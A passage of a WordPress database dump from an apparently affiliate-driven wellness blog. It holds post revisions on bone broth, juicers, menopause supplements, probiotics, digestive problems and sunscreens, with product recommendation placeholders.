\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','Nourishing from Within: The Gut-Healing Benefits of Bone Broth','','inherit','closed','closed','','5464-revision-v1','','','2023-10-10 10:16:39','2023-10-10 10:16:39','',5464,'https://tummyrevolution.com/?p=5702',0,'revision','',0),(5703,1,'2023-10-10 10:20:39','2023-10-10 10:20:39','\n

In the realm of natural remedies for gut health, bone broth has emerged as a time-honored elixir that offers a multitude of benefits. Beyond being a comforting and flavorsome drink, bone broth boasts a range of nutrients that can work wonders for your gut. In this article, we\'ll explore the gut-healing benefits of bone broth and how incorporating it into your diet can contribute to a happier, healthier digestive system.
Skip to list of top Bone Broth available to buy here

\n\n\n\n
    \n
  1. Rich in Collagen
  2. \n
\n\n\n\n

Bone broth is brimming with collagen, a protein that forms the structural foundation of our skin, bones, and connective tissues. Collagen plays a crucial role in maintaining the integrity of the gut lining, which acts as a barrier between the bloodstream and the contents of the digestive tract. By bolstering the gut lining, collagen-rich bone broth can help prevent \"leaky gut,\" a condition where the intestinal barrier becomes compromised, potentially leading to inflammation and other health issues.

\n\n\n\n
    \n
  1. Gut-Friendly Amino Acids
  2. \n
\n\n\n\n

When bone broth is simmered, it releases an array of amino acids that are essential for gut health. Glycine, in particular, has anti-inflammatory properties and supports the body\'s natural detoxification processes. Glutamine is another amino acid found in bone broth that is known for its role in repairing and maintaining the gut lining. By providing these building blocks, bone broth supports the repair and maintenance of the gut\'s delicate tissues.

\n\n\n\n
    \n
  1. Gelatin and Digestive Comfort
  2. \n
\n\n\n\n

As bone broth cools, it forms a gelatinous consistency due to the presence of collagen. This gelatin can have a soothing effect on the digestive tract, making it particularly beneficial for individuals with digestive disorders like irritable bowel syndrome (IBS) or inflammatory bowel disease (IBD). The gentle coating provided by gelatin can help ease inflammation and reduce digestive discomfort.

\n\n\n\n
    \n
  1. Nourishing Nutrients
  2. \n
\n\n\n\n

Bone broth is packed with essential nutrients like minerals, vitamins, and electrolytes that support overall health. These nutrients provide the body with the fuel it needs to function optimally, including aiding in digestion and nutrient absorption.

\n\n\n\n
    \n
  1. Improved Hydration
  2. \n
\n\n\n\n

Proper hydration is crucial for gut health, and bone broth offers a flavorful and hydrating option. The electrolytes present in bone broth can help maintain a healthy balance of fluids, promoting optimal digestion and gut function.

\n\n\n\n
    \n
  1. Boost to Beneficial Bacteria
  2. \n
\n\n\n\n

Bone broth contains compounds called glycosaminoglycans (GAGs), which can promote the growth of beneficial bacteria in the gut. A thriving population of good bacteria is essential for a balanced gut microbiome, which plays a central role in overall health.

\n\n\n\n

Conclusion

\n\n\n\n

Incorporating bone broth into your diet can be a delicious and natural way to support your gut health journey. Its collagen content, amino acids, and nourishing nutrients make it a powerful elixir for repairing and maintaining the delicate balance of your gut ecosystem. Whether sipped as a warm beverage, used as a base for soups, or incorporated into various recipes, bone broth has stood the test of time as a gut-loving tonic that nourishes both body and soul. Remember, consistency is key – make bone broth a part of your routine to reap the full array of gut-healing benefits it offers.

\n\n\n\n

Chick HERE for a Chicken and Beef Bone Broth recipe OR find a list of some great Bone Broths you can buy online below:

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','Nourishing from Within: The Gut-Healing Benefits of Bone Broth','','inherit','closed','closed','','5464-revision-v1','','','2023-10-10 10:20:39','2023-10-10 10:20:39','',5464,'https://tummyrevolution.com/?p=5703',0,'revision','',0),(5704,1,'2023-10-10 12:27:26','2023-10-10 12:27:26','Enzyme recommendation\ntop 5 enzyme supplenets\n\n','How to choose digestive enzymes','Top 5 enzyme supplements\n\n ','inherit','open','closed','','pexels-kindel-media-7298670','','','2023-10-10 12:37:29','2023-10-10 12:37:29','',5679,'http://tummyrevolution.com/wp-content/uploads/2023/10/pexels-kindel-media-7298670.jpg',0,'attachment','image/jpeg',0),(5705,1,'2023-10-10 12:27:35','2023-10-10 12:27:35','How probiotics work to improve gut health','Does Probiotics improve gut health','Can probiotics help ','inherit','open','closed','','pexels-kindel-media-7298675','','','2023-10-12 08:11:38','2023-10-12 08:11:38','',5679,'http://tummyrevolution.com/wp-content/uploads/2023/10/pexels-kindel-media-7298675.jpg',0,'attachment','image/jpeg',0),(5706,1,'2023-10-10 12:27:47','2023-10-10 12:27:47','How to select the best digestive enzymes','Top 5 enzymes 2023','Best Enzymes 2023\n\n','inherit','open','closed','','pexels-nataliya-vaitkevich-7615571','','','2023-10-12 09:02:14','2023-10-12 09:02:14','',5679,'http://tummyrevolution.com/wp-content/uploads/2023/10/pexels-nataliya-vaitkevich-7615571.jpg',0,'attachment','image/jpeg',0),(5707,1,'2023-10-10 12:28:01','2023-10-10 12:28:01','','pexels-ready-made-3850790','','inherit','open','closed','','pexels-ready-made-3850790','','','2023-10-10 12:28:01','2023-10-10 12:28:01','',5679,'http://tummyrevolution.com/wp-content/uploads/2023/10/pexels-ready-made-3850790.jpg',0,'attachment','image/jpeg',0),(5708,1,'2023-10-10 12:28:11','2023-10-10 12:28:11','','pexels-sora-shimazaki-5938391','','inherit','open','closed','','pexels-sora-shimazaki-5938391','','','2023-10-10 12:28:11','2023-10-10 12:28:11','',5679,'http://tummyrevolution.com/wp-content/uploads/2023/10/pexels-sora-shimazaki-5938391.jpg',0,'attachment','image/jpeg',0),(5709,3,'2023-10-10 12:59:04','2023-10-10 12:59:04','\n

Juicing has gained popularity as a convenient way to nourish your body with a burst of vitamins and minerals from fruits and vegetables. However, with a variety of juicer options available on the market, it can be overwhelming to decide which one suits your needs best. In this article, we\'ll compare some of the top juicer models, highlighting their features and benefits to help you make an informed decision.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

\n\n\n\n

1. Centrifugal Juicers:

\n\n\n\n

Centrifugal juicers are known for their speed and efficiency in extracting juice from fruits and vegetables. They work by using sharp blades to chop the produce and then centrifugal force to separate the juice from the pulp. These juicers are great for busy individuals who want quick and easy juicing.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Fast juicing process.
  • \n\n\n\n
  • Generally more affordable.
  • \n\n\n\n
  • Suitable for hard fruits and vegetables.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Can produce heat that might degrade enzymes and nutrients.
  • \n\n\n\n
  • Less efficient at extracting juice from leafy greens.
  • \n\n\n\n
  • Juice might have more pulp.
  • \n
\n\n\n\n

Recommended Model: Breville JE98XL Juice Fountain Plus

\n\n\n\n\"\"\n\n\n\n

2. Masticating Juicers (Slow Juicers):

\n\n\n\n

Masticating juicers use a slow, grinding process to extract juice from produce. They gently crush and squeeze fruits and vegetables, preserving more nutrients and enzymes. These juicers are ideal for those who prioritize nutrient retention and want to juice a variety of ingredients, including leafy greens.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Higher nutrient retention due to slower juicing process.
  • \n\n\n\n
  • Effective at juicing leafy greens and wheatgrass.
  • \n\n\n\n
  • Less oxidation, resulting in longer shelf life for juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Slower juicing process.
  • \n\n\n\n
  • Generally more expensive.
  • \n\n\n\n
  • Smaller feed chute might require more prep time.
  • \n
\n\n\n\n

Recommended Model: Omega NC900HDC Nutrition Center Juicer

\n\n\n\n\"\"\n\n\n\n

3. Twin Gear Juicers:

\n\n\n\n

Twin gear juicers use two interlocking gears to crush and press fruits and vegetables, extracting juice efficiently. These juicers are often used by serious juicing enthusiasts who want the highest nutrient yield from a wide variety of produce.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Maximum nutrient extraction due to dual gears.
  • \n\n\n\n
  • Effective at juicing leafy greens, wheatgrass, and herbs.
  • \n\n\n\n
  • Minimal oxidation for longer-lasting juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • More complex setup and cleaning process.
  • \n\n\n\n
  • Typically more expensive.
  • \n
\n\n\n\n

Recommended Model: Green Star Elite GSE-5000

\n\n\n\n\"\"\n\n\n\n

4. Citrus Juicers:

\n\n\n\n

As the name suggests, citrus juicers are designed specifically for citrus fruits like oranges, lemons, and grapefruits. They come in manual and electric versions and are perfect for individuals who primarily juice citrus fruits.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Designed for specific fruits.
  • \n\n\n\n
  • Easy to use and clean.
  • \n\n\n\n
  • Electric models can be quick and efficient.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Limited to citrus fruits.
  • \n\n\n\n
  • Manual models require physical effort.
  • \n
\n\n\n\n

Recommended Model: Cuisinart CCJ-500 Pulp Control Citrus Juicer

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

The best juicer for you depends on your preferences, budget, and the types of produce you plan to juice. Centrifugal juicers offer speed and convenience, masticating juicers prioritize nutrient retention, twin gear juicers provide maximum yield, and citrus juicers are specialized for specific fruits. Before making a decision, consider factors like juicing speed, ease of cleaning, versatility, and the types of fruits and vegetables you want to juice. Whichever model you choose, the key is to enjoy the benefits of fresh, nutrient-rich juices as part of your healthy lifestyle.

\n','Choosing the Best Juicer 2023: A Comparison of Top Models','','inherit','closed','closed','','5537-revision-v1','','','2023-10-10 12:59:04','2023-10-10 12:59:04','',5537,'https://tummyrevolution.com/?p=5709',0,'revision','',0),(5710,3,'2023-10-10 13:30:27','2023-10-10 13:30:27','\n

Menopause is a natural phase in a woman\'s life that brings about various hormonal changes, leading to a range of symptoms. One common issue that many women face during menopause is a loss of appetite. This can be concerning as a lack of proper nutrition can have adverse effects on overall health and well-being. While it\'s essential to consult with a healthcare provider for personalized guidance,

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

There are some supplements that may help improve appetite during menopause.

\n\n\n\n

Maca Root
Maca root is a natural supplement derived from the Peruvian maca plant. It has gained popularity for its potential to help balance hormones and alleviate menopausal symptoms, including a reduced appetite. Maca root is rich in vitamins, minerals, and amino acids that can support overall health. It may also enhance mood, which can indirectly stimulate appetite. However, it\'s essential to consult with a healthcare provider before adding maca root to your regimen, especially if you have any underlying health conditions.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Ashwagandha
Ashwagandha is an adaptogenic herb that has been used in traditional Ayurvedic medicine for centuries. It may help reduce stress and anxiety, which are common during menopause and can contribute to a loss of appetite. By promoting relaxation and balancing cortisol levels, ashwagandha may indirectly stimulate appetite. As with any supplement, it\'s crucial to discuss its use with a healthcare professional, especially if you\'re taking medications or have any medical conditions.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, have numerous health benefits, including potential appetite enhancement. They can help reduce inflammation, improve mood, and support brain health, all of which can contribute to a healthier appetite. Omega-3 supplements are generally safe, but it\'s advisable to choose high-quality, purified fish oil to avoid contaminants.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Zinc
Zinc is an essential mineral that plays a crucial role in various bodily functions, including appetite regulation. A deficiency in zinc can lead to a reduced sense of taste and smell, which can diminish appetite. Menopausal women may be at risk of zinc deficiency, making supplementation a potential option. However, it\'s essential not to exceed recommended doses, as excessive zinc intake can have adverse effects on health.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Vitamin B Complex
B vitamins, including B6 and B12, are essential for maintaining a healthy appetite and energy levels. During menopause, hormonal changes can impact the absorption of these vitamins. A vitamin B complex supplement can help ensure you\'re getting an adequate supply of these nutrients. It\'s best to consult with a healthcare provider to determine the right dosage and formulation for your specific needs.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Ginseng
Ginseng is an herbal supplement known for its adaptogenic properties. It may help reduce fatigue, improve mood, and enhance overall well-being, which can positively influence appetite. Ginseng supplements are available in various forms, including capsules, teas, and powders. Consult with a healthcare provider to determine the most suitable type and dosage for you.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

A loss of appetite during menopause can be distressing, but there are supplements that may help improve your appetite and overall well-being. However, it\'s crucial to remember that supplements should complement a balanced diet and healthy lifestyle, not replace them. Always consult with a healthcare provider before adding any new supplements to your routine, as individual needs and potential interactions with medications can vary. Additionally, prioritize a well-rounded diet, regular exercise, and stress management techniques to support your overall health during this transitional phase in your life.

\n','Best Supplements to Boost Appetite During Menopause','','inherit','closed','closed','','5522-revision-v1','','','2023-10-10 13:30:27','2023-10-10 13:30:27','',5522,'https://tummyrevolution.com/?p=5710',0,'revision','',0),(5711,3,'2023-10-10 14:01:07','2023-10-10 14:01:07','\n

Menopause is a natural phase of a woman\'s life, marking the end of her reproductive years. While it brings about various changes in the body, one of the most common and frustrating challenges women face during this time is weight gain or difficulty in losing weight. Hormonal shifts, slowed metabolism, and other factors can make it challenging to shed those extra pounds. However, with the right approach, including a well-balanced diet, regular exercise, and strategic supplementation, managing weight loss during menopause is attainable.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

In this blog post, we\'ll focus on the role of supplements and how they can aid in your weight loss journey during menopause.

\n\n\n\n

Calcium
Menopausal women are at a higher risk of bone density loss. Calcium supplements help maintain strong bones and also have a positive impact on weight loss. Studies suggest that adequate calcium intake can prevent fat absorption in the digestive tract and promote fat breakdown. Aim for around 1,000 to 1,200 mg of calcium per day from supplements and dietary sources like dairy products, leafy greens, and fortified foods.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Vitamin D
Vitamin D works in tandem with calcium to support bone health and has been linked to weight loss. Additionally, it may help regulate insulin levels and improve mood during menopause. Most experts recommend 600 to 800 IU of vitamin D daily for menopausal women, but consult your healthcare provider for personalized guidance.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, have numerous health benefits, including weight management. They help reduce inflammation and support heart health. Omega-3s also assist in maintaining healthy hormone levels, which can be especially beneficial during menopause. Aim for 1,000 to 2,000 mg of omega-3s per day, either through supplements or by incorporating fatty fish like salmon and mackerel into your diet.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Magnesium
Magnesium plays a crucial role in maintaining muscle function and overall health. It can help regulate blood sugar levels, which can be erratic during menopause, and improve sleep quality. Sleep is closely linked to weight management, as poor sleep can lead to weight gain. Consider a daily magnesium supplement or consume magnesium-rich foods like nuts, seeds, and whole grains.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Probiotics
Probiotics are beneficial bacteria that promote a healthy gut microbiome. Emerging research suggests that a balanced gut flora may support weight loss and help control inflammation. You can find probiotics in supplement form or in fermented foods like yogurt, kefir, and kimchi. Aim for a daily intake of probiotics, either through supplements or dietary sources.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

Green Tea Extract
Green tea extract contains compounds like EGCG (epigallocatechin gallate), which have been shown to boost metabolism and enhance fat oxidation. Some studies suggest that green tea extract supplements can aid in weight loss efforts. Consult with your healthcare provider for the appropriate dosage and recommendations.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

While supplements can complement your efforts to manage weight during menopause, they should not be viewed as a quick fix. A holistic approach that combines these supplements with a balanced diet, regular exercise, stress management, and adequate sleep is essential for achieving and maintaining a healthy weight during this life stage. Before adding any supplements to your routine, it\'s crucial to consult with a healthcare professional to ensure they are suitable for your individual needs and health status. Remember that every woman\'s menopause experience is unique, so tailoring your approach is key to success.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Supplements for Managing Weight Loss During Menopause','','inherit','closed','closed','','5516-revision-v1','','','2023-10-10 14:01:07','2023-10-10 14:01:07','',5516,'https://tummyrevolution.com/?p=5711',0,'revision','',0),(5714,3,'2023-10-10 14:12:36','2023-10-10 14:12:36','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus Acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n


Lactobacillus Casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

Summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n','The Best Probiotics to Support Your Gut Health During & After Menopause','','inherit','closed','closed','','5586-revision-v1','','','2023-10-10 14:12:36','2023-10-10 14:12:36','',5586,'https://tummyrevolution.com/?p=5714',0,'revision','',0),(5713,3,'2023-10-10 14:08:57','2023-10-10 14:08:57','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Lactobacillus rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.

\n\n\n\n

Lactobacillus casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Saccharomyces boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

In summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n\n\n\n

\n','The Best Probiotics to Support Your Gut Health During Menopause','','inherit','closed','closed','','5459-revision-v1','','','2023-10-10 14:08:57','2023-10-10 14:08:57','',5459,'https://tummyrevolution.com/?p=5713',0,'revision','',0),(5715,3,'2023-10-10 14:18:42','2023-10-10 14:18:42','\n

Menopause is a natural phase in a woman\'s life, marking the end of her reproductive years. While it brings about a multitude of physical and hormonal changes, many women may not be aware that these changes can also impact their digestive system. Digestive problems during menopause are not uncommon, but understanding the causes and seeking appropriate treatment can help alleviate discomfort and improve overall well-being.

\n\n\n\n

The Menopausal Digestive Connection

\n\n\n\n

As women approach menopause, hormonal fluctuations, particularly a decline in estrogen and progesterone levels, can influence various bodily functions, including digestion. These hormonal changes can affect the functioning of the gastrointestinal tract, leading to a range of digestive issues. Common digestive problems during menopause include:

\n\n\n\n
    \n
  1. Gastroesophageal Reflux Disease (GERD): The decrease in estrogen levels can lead to a weakening of the muscles that control the opening between the esophagus and stomach, resulting in acid reflux and heartburn.
  2. \n\n\n\n
  3. Bloating and Gas: Hormonal changes can slow down digestion, causing food to linger in the digestive tract longer than usual. This can lead to increased gas production and bloating.
  4. \n\n\n\n
  5. Constipation: Reduced estrogen levels can impact bowel movements by affecting muscle contractions in the intestines. This can result in constipation and discomfort.
  6. \n\n\n\n
  7. Irritable Bowel Syndrome (IBS): Menopause can exacerbate symptoms of IBS, including abdominal pain, diarrhea, and constipation, due to the hormonal changes\' impact on gut sensitivity.
  8. \n\n\n\n
  9. Changes in Appetite: Fluctuating hormones can lead to changes in appetite, potentially causing overeating or loss of interest in food.
  10. \n
\n\n\n\n

Managing Digestive Problems

\n\n\n\n

The good news is that there are several effective strategies for managing digestive problems during menopause. It\'s important to consult a healthcare professional before making any significant changes, as individual needs may vary. Here are some approaches to consider:

\n\n\n\n

Dietary Modifications:

\n\n\n\n
    \n
  1. Increase fiber intake: A high-fiber diet can help alleviate constipation and promote regular bowel movements.
  2. \n\n\n\n
  3. Avoid trigger foods: Spicy, acidic, and fatty foods can worsen acid reflux and heartburn. Limiting these foods can provide relief.
  4. \n\n\n\n
  5. Stay hydrated: Drinking plenty of water supports healthy digestion and prevents constipation.
  6. \n\n\n\n
  7. Probiotics: Incorporating probiotic-rich foods or supplements can help maintain gut health and ease symptoms of bloating and gas.
  8. \n\n\n\n
  9. Lifestyle Changes:
  10. \n\n\n\n
  11. Maintain a healthy weight: Excess weight can contribute to digestive issues. Regular exercise and a balanced diet can aid in weight management.
  12. \n\n\n\n
  13. Eat smaller, frequent meals: Opting for smaller meals throughout the day can help prevent overloading the digestive system.
  14. \n\n\n\n
  15. Stress management: Practicing relaxation techniques such as yoga, meditation, or deep breathing can alleviate stress-related digestive problems.
  16. \n
\n\n\n\n

Medications and Supplements:

\n\n\n\n
    \n
  • Antacids: Over-the-counter antacids can provide temporary relief from heartburn and acid reflux symptoms.
  • \n\n\n\n
  • Laxatives: For occasional constipation, gentle laxatives may be recommended, but they should be used under medical supervision.
  • \n\n\n\n
  • Hormone therapy: In some cases, hormone replacement therapy (HRT) may be prescribed to manage menopausal symptoms, which could indirectly improve digestive issues.
  • \n\n\n\n
  • Regular Medical Check-ups:
  • \n\n\n\n
  •  Regular visits to a healthcare provider are essential to monitor and manage any emerging health concerns.
  • \n
\n\n\n\n

LINK TO THE BEST SUPPLEMENTS FOR GOOD GUT HEALTH DURING & AFTER MENOPAUSE

\n\n\n\n

Conclusion

\n\n\n\n

While digestive problems during menopause can be challenging, they are manageable with the right approach. By making dietary adjustments, adopting a healthy lifestyle, considering medications if necessary, and seeking guidance from healthcare professionals, women can navigate this transitional phase with greater comfort and improved digestive well-being. Remember, each woman\'s experience is unique, so it\'s important to tailor strategies to individual needs and preferences for the best results.

\n','A Comprehensive Guide to Digestive Problems During Menopause','','inherit','closed','closed','','5489-revision-v1','','','2023-10-10 14:18:42','2023-10-10 14:18:42','',5489,'https://tummyrevolution.com/?p=5715',0,'revision','',0),(5717,3,'2023-10-11 06:29:46','2023-10-11 06:29:46','\n

The best sunscreens for health are those that provide effective protection against the harmful effects of the sun\'s ultraviolet (UV) rays while minimizing potential risks associated with certain sunscreen ingredients.

\n\n\n\n

Here are some key factors to consider when choosing a sunscreen for optimal health:

\n\n\n\n

Broad-Spectrum Protection: Look for a sunscreen labeled as \"broad-spectrum,\" which means it offers protection against both UVA and UVB rays. UVA rays can prematurely age the skin, while UVB rays are responsible for sunburn.
SPF level, (Sun Protection Factor) of at least 30. SPF 30 provides strong protection, and SPF 50 offers even higher protection. To maintain protection for a longer duration choose a
Water-Resistant Sunscreen, and be sure to reapply after swimming or sweating as indicated on the label.
Mineral Sunscreen: Mineral sunscreens contain zinc oxide or titanium dioxide as their active ingredients. These ingredients provide physical (rather than chemical) protection by sitting on the skin\'s surface and reflecting or scattering UV rays. They are generally considered safe and are less likely to cause skin irritation.

\n\n\n\n

Sunscreen Face Lotion, Link To Recommended Product.

\n\n\n\n

These Products are, Reef-Friendly: Some chemical sunscreen ingredients, like oxybenzone and octinoxate, can harm coral reefs. If you plan to swim in the ocean, consider a sunscreen labeled as \"reef-friendly\" or \"ocean-safe\" that doesn\'t contain these harmful chemicals.

\n\n\n\n

They are also, Fragrance-Free Option for Sensitive Skin, Fragrances can sometimes cause skin irritation or allergies.

\n\n\n\n\"\"\n\n\n\n

Sunscreen Bodylotion For Sensitive Skin Type, Link to Recommended Product

\n\n\n\n

This Products is, Reef-Friendly: Some chemical sunscreen ingredients, like oxybenzone and octinoxate, can harm coral reefs. If you plan to swim in the ocean, consider a sunscreen labeled as \"reef-friendly\" or \"ocean-safe\" that doesn\'t contain these harmful chemicals.
This Product is also, Fragrance-Free Option for Sensitive Skin, Fragrances can sometimes cause skin irritation or allergies.

\n\n\n\n\"\"\n\n\n\n

Sunscreen Bodylotion For Sensitive Skin Type - Link to Recommended Product

\n\n\n\n

This Products is, Reef-Friendly: Some chemical sunscreen ingredients, like oxybenzone and octinoxate, can harm coral reefs. If you plan to swim in the ocean, consider a sunscreen labeled as \"reef-friendly\" or \"ocean-safe\" that doesn\'t contain these harmful chemicals.
This Product is also, Fragrance-Free Option for Sensitive Skin, Fragrances can sometimes cause skin irritation or allergies.

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

Dermatologist-Recommended: Consult with a dermatologist to get personalized sunscreen recommendations, especially if you have specific skin concerns or conditions.

\n\n\n\n

Remember that the best sunscreen for health is one that you will use consistently. Applying sunscreen generously and regularly, seeking shade when necessary, and wearing protective clothing (such as wide-brimmed hats and sunglasses) are all important components of sun protection for your skin\'s health.

\n','Best Sunscreens for Sensitive Skin Type to Maintain Good Health','','inherit','closed','closed','','5716-revision-v1','','','2023-10-11 06:29:46','2023-10-11 06:29:46','',5716,'https://tummyrevolution.com/?p=5717',0,'revision','',0),(5718,3,'2023-10-11 09:39:15','2023-10-11 09:39:15','\n

The best sunscreens for health are those that provide effective protection against the harmful effects of the sun\'s ultraviolet (UV) rays while minimizing potential risks associated with certain sunscreen ingredients.

\n\n\n\n

Here are some key factors to consider when choosing a sunscreen for optimal health:

\n\n\n\n

Broad-Spectrum Protection: Look for a sunscreen labeled as \"broad-spectrum,\" which means it offers protection against both UVA and UVB rays. UVA rays can prematurely age the skin, while UVB rays are responsible for sunburn.
SPF level, (Sun Protection Factor) of at least 30. SPF 30 provides strong protection, and SPF 50 offers even higher protection. To maintain protection for a longer duration choose a
Water-Resistant Sunscreen, and be sure to reapply after swimming or sweating as indicated on the label.

\n\n\n\n

Sunscreen Face Lotion, Link To Recommended Product.

\n\n\n\n

These Products are, Reef-Friendly: Some chemical sunscreen ingredients, like oxybenzone and octinoxate, can harm coral reefs. If you plan to swim in the ocean, consider a sunscreen labeled as \"reef-friendly\" or \"ocean-safe\" that doesn\'t contain these harmful chemicals.

\n\n\n\n

They are also Fragrance-Free, which is a good Option for Sensitive Skin, Fragrances can sometimes cause skin irritation or allergies.

\n\n\n\n\"\"\n\n\n\n

Sunscreen face Lotion, Link to Recommended Product

\n\n\n\n

This Product has Minerals: This Mineral sunscreens has zinc oxide as their active ingredients. These ingredients provide physical (rather than chemical) protection by sitting on the skin\'s surface and reflecting or scattering UV rays. It is generally considered safe and are less likely to cause skin irritation.

\n\n\n\n\"\"\n\n\n\n

